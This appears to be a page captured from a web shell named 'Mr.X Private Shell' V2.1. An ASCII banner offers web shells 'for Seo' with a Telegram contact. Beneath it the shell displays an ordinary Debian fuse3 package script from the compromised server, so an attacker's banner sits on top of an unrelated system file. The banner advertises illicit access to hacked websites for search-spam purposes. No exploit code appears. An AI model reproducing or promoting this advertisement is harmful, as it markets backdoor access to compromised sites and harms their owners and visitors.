__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/sh set -e # begin-remove-after: released:trixie # protective diversion of files moved from / to /usr, to avoid file loss. if [ "$1" = "upgrade" ] || [ "$1" = "install" ]; then for f in /bin/fusermount /sbin/mount.fuse; do dpkg-divert --package fuse3 --no-rename --divert "$f.usr-is-merged" --add "$f" done fi # end-remove-after exit 0